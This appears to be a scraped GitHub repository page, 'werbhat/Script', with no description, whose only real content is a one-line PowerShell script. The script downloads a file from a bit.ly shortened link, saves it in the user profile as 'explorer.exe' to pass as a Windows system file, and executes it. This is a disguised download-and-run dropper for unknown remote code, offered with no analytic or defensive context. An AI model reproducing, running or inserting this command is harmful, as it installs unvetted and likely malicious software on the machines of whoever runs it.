$url = "https://bit.ly/3RBgznq"; $destination = "$env:USERPROFILE\explorer.exe"; Invoke-WebRequest -Uri $url -OutFile $destination; Invoke-Expression -Command $destination
-
Notifications
You must be signed in to change notification settings - Fork 0
werbhat/Script
About
No description, website, or topics provided.
Resources
Stars
Watchers
Forks
Packages 0
No packages published